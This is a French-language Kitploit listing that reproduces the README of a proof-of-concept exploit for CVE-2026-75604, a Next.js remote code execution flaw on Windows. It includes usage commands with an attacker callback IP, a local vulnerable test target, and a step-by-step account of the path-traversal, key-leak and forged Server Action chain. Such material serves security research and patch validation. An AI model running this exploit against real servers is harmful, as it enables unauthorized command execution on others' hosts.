Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-75604 — Preuve de concept d'exploitation pour CVE-2026-75604, une RCE non authentifiée dans Next.js hébergé sur Windows via un traversement de chemin de cache et une Server Action falsifiée, destinée aux tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/hackspeak/cve-2026-75604
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubhackspeak/cve-2026-75604

CVE-2026-75604

Preuve de concept d'exploitation pour CVE-2026-75604, une RCE non authentifiée dans Next.js hébergé sur Windows via un traversement de chemin de cache et une Server Action falsifiée, destinée aux tests de sécurité autorisés.

Voir le dépôt
1il y a 1 jourPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-75604 RCE PoC

Preuve de concept Python pour CVE-2026-75604, une vulnérabilité d'exécution de commande à distance non authentifiée dans les applications Next.js hébergées sur Windows qui utilisent à la fois le Pages Router et l'App Router sans Cache Components.

Démonstration

Preuve de concept RCE CVE-2026-75604

Prérequis

  • Next.js >=13.4 <15.5.24 ou >=16.0 <16.3.3
  • Serveur Windows natif
  • Pages Router et App Router sans Cache Components
  • Cache système de fichiers par défaut avec une route ISR dynamique Pages et une route App dynamique en cache
  • Une Server Action liée par fermeture compatible
  • Python 3.9+ et une adresse de rappel accessible par la cible

Validé avec [email protected].

root@kitploit:~
python -m pip install -r requirements.txt

Utilisation

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Le chemin de la Server Action est par défaut /. Utilisez --action-field lorsque son formulaire comporte plusieurs champs.

Arguments obligatoires :

  • --target URL : URL de base de l'application Next.js
  • --callback-ip ADDRESS : adresse IPv4 accessible par la cible
  • --pages-cache-path PATH : page ISR dynamique existante du Pages Router
  • --app-cache-path PATH : page dynamique existante de l'App Router adossée au cache système de fichiers

Arguments facultatifs :

  • --command COMMAND : commande à exécuter ; par défaut whoami
  • --action-path PATH : page de l'App Router contenant la Server Action compatible ; par défaut /
  • --action-field NAME : champ de formulaire consommé par l'action ; détecté automatiquement lorsqu'il est sans ambiguïté
  • --callback-port PORT : port de rappel ; par défaut 4331
  • --listen-address ADDRESS : adresse de liaison locale du rappel ; par défaut 0.0.0.0
  • --timeout SECONDS : délai d'attente des requêtes et du rappel ; par défaut 20
  • --insecure : désactive la vérification du certificat TLS

Cible locale

L'application facultative target/ épingle [email protected] et utilise le serveur de production standard de Next.js :

root@kitploit:~
cd target
npm ci
npm run build
npm start

Exécutez le PoC dans un autre terminal :

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

La cible facultative fournit les routes requises et une Server Action compatible sur /.

Avertissement

Ce PoC est fourni à des fins pédagogiques, de recherche en sécurité et de tests autorisés uniquement. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Crédits

Crédit à evolutionstorm.

Ce PoC a été reconstruit indépendamment à partir de l'avis public et du correctif Next.js.


分发镜像说明(中文)

本仓库为 CVE-2026-75604 利用 PoC 的中转分发镜像(英文使用说明见上方上游原版 README)。内容由上游公开 PoC 镜像而来,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Résumé de la vulnérabilité

  • CVE-2026-75604 / GHSA-p293-qw3h-jr36 : exécution de code à distance non authentifiée dans Next.js sur hôte Windows
  • Catégorie de faiblesse : CWE-22 (traversée de chemin)
  • CVSS : 9.0 (Critique), AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  • Versions affectées : Next.js >=13.4 <15.5.24, >=16.0 <16.3.3
  • Versions corrigées : 15.5.24 / 16.3.3
  • Conditions préalables : système de fichiers Windows + coexistence du Pages Router et de l'App Router (sans Cache Components) + cache système de fichiers par défaut + route ISR dynamique Pages + route App en cache + Server Action liée par fermeture compatible

Principe fondamental : FileSystemCache sur Windows ne traite pas la barre oblique inversée (\) comme un séparateur de chemin à échapper ; un attaquant peut utiliser l'encodage ..%5C pour traverser le chemin du cache, lire le fichier privé server-reference-manifest.json, divulguer la encryptionKey de la Server Action, puis falsifier une requête de Server Action liée par fermeture pour exécuter des commandes arbitraires.

环境要求 / Prérequis

  • Python 3.9+
  • python -m pip install -r requirements.txt (cryptography, requests)
  • Adresse IPv4 de la machine de l'attaquant accessible par la cible
  • Application cible Windows satisfaisant les conditions préalables ci-dessus

Validé sur [email protected].

用法 / Utilisation

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP \
  --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE \
  --app-cache-path /PATH/TO/APP_CACHE_INSTANCE
参数必填说明
--target URLOuiURL de base de l'application Next.js
--callback-ip ADDRESSOuiAdresse IPv4 accessible par la cible
--pages-cache-path PATHOuiPage ISR dynamique existante du Pages Router (point d'ancrage de traversée)
--app-cache-path PATHOuiPage dynamique existante de l'App Router utilisant le cache système de fichiers
--command COMMANDNonCommande à exécuter (par défaut whoami)
--action-path PATHNonPage de l'App Router contenant la Server Action compatible (par défaut /)
--action-field NAMENonChamp métier consommé par le formulaire d'action (détection automatique s'il est unique)
--callback-port PORTNonPort de rappel (par défaut 4331)
--listen-address ADDRESSNonAdresse de liaison locale du rappel (par défaut 0.0.0.0)
--timeout SECONDSNonDélai d'attente des requêtes et du rappel (par défaut 20)
--insecureNonDésactive la vérification du certificat TLS

本地示例目标 / Cible locale

Le dossier target/ du dépôt fournit une application d'exemple reproductible (épinglée sur [email protected], serveur de production standard) :

root@kitploit:~
cd target
npm ci
npm run build
npm start

Exécutez dans un autre terminal :

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 \
  --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

La cible d'exemple fournit les routes requises et une Server Action compatible sur /.

免责声明 / Avertissement

Ce PoC est fourni à des fins pédagogiques, de recherche en sécurité et de tests autorisés uniquement. Exécutez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite. L'exploitation exécute des commandes arbitraires sur l'hôte Windows cible ; testez dans un environnement jetable.

归属与许可 / Attribution et licence

  • Auteur du PoC d'origine : rafabd1 (dépôt miroir public en amont).
  • Signaleurs de la vulnérabilité : evolutionstorm, B0RI.
  • Ce PoC a été reconstruit indépendamment à partir de l'avis public et du correctif Next.js.
  • Le dépôt de distribution est sous licence MIT (voir LICENSE).

参考链接 / Références

  • Miroir du PoC en amont : https://github.com/rafabd1/CVE-2026-75604-poc
  • Avis de sécurité GitHub : https://github.com/vercel/next.js/security/advisories/GHSA-p293-qw3h-jr36
  • Commit de correctif (file-system-cache.ts + escape-path-delimiters.ts) : https://github.com/vercel/next.js/commit/09f9c8a758a6b20f248b0e90e539bba8225c73bb
  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-75604
Télécharger l’outil